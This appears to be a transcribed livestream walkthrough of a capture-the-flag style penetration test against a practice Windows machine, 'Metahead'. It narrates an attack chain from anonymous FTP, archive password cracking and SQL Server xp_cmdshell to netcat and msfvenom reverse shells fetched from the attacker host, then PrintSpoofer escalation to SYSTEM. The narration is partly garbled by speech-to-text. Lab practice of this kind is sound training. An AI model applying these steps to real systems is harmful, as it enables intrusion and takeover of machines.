Hi everyone, we continue non-stop with the retransmission of pen testing at my channel. Let me review at Twitch if all is right. We are online, yes, perfect. So we are going to perform a penetration test over hard machine try harder at practice of offensive security. The name is Metahead. Let me check if it's alive. Perfect, the machine is alive, so we can start to perform privilege escalation with a penetration test recognition over the common ports and service opens this target machine. So we can continue reviewing more faster with fast TCP scan. This is I've never said you before, but this is a script available at my GitHub. So let me see github.com Fonsi. The security scripts. This is a fast TCP. This is the compiled binary for execution, and this is the Go source code for perform this TCP fast scan, because Go work with the threads. It's available for you, the binary and the source code at my personal GitHub. So okay, we continue with the machine. Yeah, it seems that there are open the port 80, Samba. So we can start to review the Samba client connection with null session to the target IP. So it seems that there are no open. So we are going to perform this executing again. So and launch enum for Linux to this machine. So let me review if provides some information about the open ports or service. NVT start can't enumerate the Samba work domain. Yeah, can obtain a session. No, there are not enough information here. So right now we can execute it again, because it seems that the network is there are SMTP FTP, but I don't show the port. Maybe it's this one, because finish at 21, but I'm not sure because the recognition not finished. So we can try to do this one. 1 2 2 2 1. The target IP is this one. So so there are an 80 port that we can open in the browser, because it is HTTP. So RPC, maybe we can review RPC client. Yeah, as I thought, This is the FTP V service that allow you. Oh, there are content inside. Is important, and this is a SQL server. Mm, Metahead. This is our desktop. Um, yeah, maybe I can cut the target and map and filter by open ports. So this is the e server here with the admin. Oh, um, admin 123. Admin without password. Now, so it seems that it not work. So we can use the buster with the common txt. Um, yeah, start to fuzzing this directory. During this process, I'm going to try to connect to FTP at the board um, 12221. Yeah. So usage hostname port exit is bad, right? So let me check this one. This port 12221. This is the FTP. Um, Maybe with telnet. Mm, 122. Oh, sorry, it's a bad port. Is this one? So anonymous, um, anonymous domain.com. Yeah, logging it. Um, there are many interesting data, but um, maybe this MySQL um, is the more important file. Get We can obtain a local for Spectrum file simple mp3. So palindromes. So get this one. Um, Exit. So target and map. Um, Let me check it. Open folder. Um, we can go to streaming. Yeah, inside of the streaming, I'm looking for Metahead. Is this one? And inside of nmap, password Metahead admin. And what is the name of the service? What web? Sp.next. So we can review with So what web mm, minus a3, this could be um, Plantronics. So Plantronics could be um, now. So maybe we can during this process search exploit about what is Plantronics. Plantronics have local privilege escalation. Um, Spock's update service privilege escalation, but this is for when I can access minus m. Yeah, so let me check it for this one and say drop major upgrade config, say program data spoke 36 directory, the content of major upgrade config should look like the following liner. Advertise full path to your desired payload. It's in Windows. Oh, this could be for privilege escalation. So step to exploit POC, open CMD, navigate to this one, put this file. Yeah, perfect. So maybe you need okay, but this is when we are inside. So at this moment, I need open this file because it has a password. I can move it to data, and I can move the palindromes to data too, and I can move the POC exploit to exploits. Perfect. So at this point I'm going to data, here cd data, and here we can use rar to join to this file. Yeah, perfect. So we can hash join of this file, and we can try to crack it. Join hash join. Perfect. So minus minus show say is let me in please, let me in please. So we can open this file, with map is inside of data. We write let me in please. So perfect. Is MySQL backup open to here? What? I do something wrong. Yeah, I want to open it. Open. Let me in please. Yes. So username and credentials. This is a common username of MySQL. So we can do this one. Echo MySQL user. So at this point we can split this one, put it here. So inside of data, we can cut the MySQL. Oh no, cut the my, but it's not MySQL. It's a SQL service. So move MySQL to SQL service at Microsoft. So PSQL um, to the what is the target port? See cat this one at nmap and target nmap pipe grep open. Is this port the the target port? um, um, at 70 minus p is this one. This is all, no? uh, mm, mm. Error connection to the server. So history pipe grep SQL history pipe grep SQL. Okay, minus u sa history pipe grep SQL. um, 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 let me check. Kali Linux client SQL server. MySQL click maybe. Client cool package. So MySQL client, they are inside of in packet. Yes, locate this one. This is my last build version of in packet Python 3 of this one. Yes, this is the let me check. Cut the data, cut the SQL SQL service. Yeah, edge facility thrown. Yeah, the target IP is the same, and this is the port. So yeah, we are inside. We can use help and enable this cell. So right now we can perform a remote command execution at the operative system. For example, who am I? NT service, MySQL, SQL Express. So ID, yeah, who am I? Barra all, slash all, sorry. Um, Authenticated user, this organization, all service, monitor users. So we can upload a netcat for spawner reversal. Locate netcat.exec cp this one at scripts. Perfect. So we go to scripts, python 3 minus m, python 3 minus m, server at 18, for example 4043. Yes, could be right. Right now here we can review if we can write, for example, at echo test at maybe C, Windows, temp test.txt, nothing for output, so we can review this directory and say file not found. So maybe at app, no, it's program data, um, so test.txt, we can try to write it echo test add inside of C program data. We can write a test.txt. So it's possible here. This is a program data. Yeah, exist. Kinda write a test here dot test dot txt. Oh, perfect. So we can review this one. Perfect. Right now we can perform PowerShell wget HTTP to my attacker IP. So if config at port 80, and I want to netcat.exec, and the out file should be C program data netcat.exec. We found an error say it's but maybe dislike this port. We oh yes, is the port is 4043, so it's a null while unable to connect to remote port. So and the previous error is that not found. So we can try to upload the server here, but sudo atc init the apache stop. So apache to stop. Perfect, stop it. And right now, yeah. So it's just ask for the binary. Should write it at the output file. So it seems that we can review this netcat.exec here. Perfect. Now we should create netcat exec minus nv to the attacker machine IP that is 49.118 is yeah, at port maybe 80 because it's working the connection, and netcat nlvp at 80 port. Finally we need to spawn a cmd.exec, but of course this binary not exist here. Is at c program data. Whoa, yes, is who am I, who am I, um, who am I all. Yes. So at this point, notify personal privilege enable. So we are going to verify, but this this privilege allow user privilege escalation of impersonating. So create global privilege escalation evasion tokens. Yeah, any process holding privilege can impersonate but not create any token to which able to get handled. You can privilege token from Windows Service DCOM making perform. So this one. So I remember that I use this, but before to do this, we are going to review the operative system cd users dir cd jane access is denied for jane. So administrators should be denied too. Yeah, but we can go to our brighter program data here. Yes, here we can obtain a win piece, locate win ps dot bat dot exe is better. Cp this one at directory scripts, and we can go to the directory scripts, scripts, yeah, Python minus m, Python, yeah, with Python minus m, simple HTTP server at port, for example, 21, and from here we can obtain the PowerShell wget HTTP my attacker machine is 49, this one, the port is 21, and the binary name is winps.exe. So here the out file is going to be winps.exe. Don't work for this port, so let me check the open output ports and map and target and map, grep by open, and I think that one of them should be the let me check, with this port 135, here we can use 135, this one. Yes, this port is working. So winps.exe should be executed. We can review the output of the recognition script. It's a Windows Bull search powered. It seems that this server is vulnerable to this WSUS attack part 2. Security update, this one, technical analysis, documented vulnerability, hot potato, PWSUS, suspicious. This is a way for privilege escalation. Another way could be the first script that we review is cd exploit. So it's a 47, this one. So it seems that program data plantronics, this one, should be here should be MySQL spider, environment variables. So we continue later. This one, yeah, it seems that there are a config, so we can type this config file, spokes.config. this is the default config of the application. um, this say that you need navigate to this one, write this major upgrade config, but maybe it should this is the payload that you want to write. Yes, I've never escaped the privilege like this. We can try it, for example. Um, at this point, I don't want to do this. Um, I prefer that my payload should be something like C program data netcat dot exe minus nv to this one. This is that I want. Um, so yes, but the new port should be 135. A regular user. So maybe netcat minus nvlp at this port. Um, yes, this should be at this directory. So it should be like this. So can I dir no, don't work. So test dot txt. Maybe we don't have permission for write here with this user. Echo test to this one, test dot txt. If I dir this one, yeah, can write. So what is the problem here? Major upgrade config. Dear, not phone. So maybe I can echo test to this one. Um, so right now it should be exist. No, major upgrade config. It seems that it removed so faster or whatever. So if we write only this one, um, like in the book, maybe uh, cd um, run data plantronics there cd spoke spokes 3G. So there again, um, we can copy and paste this one, but I think that is not properly. So there, whoa, it's executed magically at this moment. So there, maybe I can update to this one. Um, this one to this one. Maybe I have hmm um it not try to send me nothing. So if I upload a new reversal, for example, MSF Veno window PowerShell, so type exe to shell.exe. um, the port could be 135. Why not? There's a shell here. So with this port listening, I can PowerShell wget HTTP my attacker IP uh, this one to mm, this port with the name of shell.exe. um I want to out file um here, for example, shell.exe. So it say can connect, yes, because the server is wrong. Yeah, this one and this one shell.exe minus out file um, shell.exe. Yeah, it's just request. So here uh, I can use this payload and put now copy paste um, shell.exe to the major upgrade. So listen at this port. Oh, it don't work, brother. Shell.exe like this. Shell.exe. So there. Important. Uh, Maybe the out file um, should be C program data shell.exe. So yes, it's copy perfect. If we listen at this port and go back to this directory, I can perform this one shell.exe. Um, what is this shell.exe? You remove it. Mm -mm. Shell.exe. Yep. I think that mm, Windows Defender dislike this payload and remove it quickly. So shell.exe, if we, yeah, remove it. Ah! Okay, so we can continue with the privilege escalation of the impersonate. Is this one? So with print spoofer is easy. Um, there are one release here, and we can obtain the link, so it's possible at exploit download the binary um, print spoofer, this one. So this one, it's going to be at exploits. We're going to use the 32 bits, but I'm not sure what is the right version. So I copy this but I think PowerShell, just copy paste. This is the print spoofer. Minus out file. This one could be print spoofer.exe. This is the most easy privilege escalation that you can perform. So print spoofer.exe, and how can we execute this one? Let me check. It's only need to execute bind reversal bind cell reversal psxpi etc minus c minus c cmd. So you only need do minus c minus c cmd dot exe. So who am I? Who am I? Who am I slash all. You have all the privileges and cd c users um, first to Jane. Jane. Yes, dear. cd desktop. Dear. Type local.txt. The second one to the administrator. Desktop again, and here type proof.txt. That is easy, but I want to review other ways to privilege escalation. Why not? Basic system information. This is the potential vulnerability. Username system, apps not installed, widget not installed, LSA protected is not enabled, credential is not enabled, so current past, AV detected, local account filter policy from non-Windows binaries, history file, PowerShell setting, site, internet settings, code base, so fixed, file system available of 50 gigas, LAMAN compatibility level, outbound restrictions, enumerated named pipes, see, you must do it. Check if the shown admin equivalent privilege, built-in performance monitoring, current logo, authenticated user, this organization, local, and the service, all service. So this could be managed all the service. It's important if you found a vulnerable service with an unquoted path service or another kind of vulnerability, you can manage it, or yeah, and reboot Metahead Jane, yeah, the user, current user idle time, clipboard, um, SQL telemetry, yeah, logged users, display information about local users, guest Jane is enabled true. mm, so RTP sessions, for example with Jane, readable credentials, could be this one. Se programata with peace, netcat, perform the hijacking, for example spoke, it keeps you Plantronics have software up to date. Generics execute, start stop, modifier service, yes. Checking bright permission in path folders del hijacking. So here say current version unquoted. Oof, I tired and I'm hungry. Folder permission users happen regpath active directory installed components. So task folder authenticated users, escalation vulnerability drivers, a lot informations, network shares. So not found, no. RTP not found, client settings true false, the API master keys, cmd.exec, you must administrator to run this check. Looking as client.exec. Possible password file with user credentials. So this is important. File permission, WinPeace, netcat, nt, analyzing window user, Google service, then config. So maybe I can type this file I can type um, no, there are no other clues. So I want to check this W suspicious about the no vulnerability. I think is can create a new administrator with the elevated privilege at the operative system. So maybe this afternoon. Um, this is all for this video, and see you.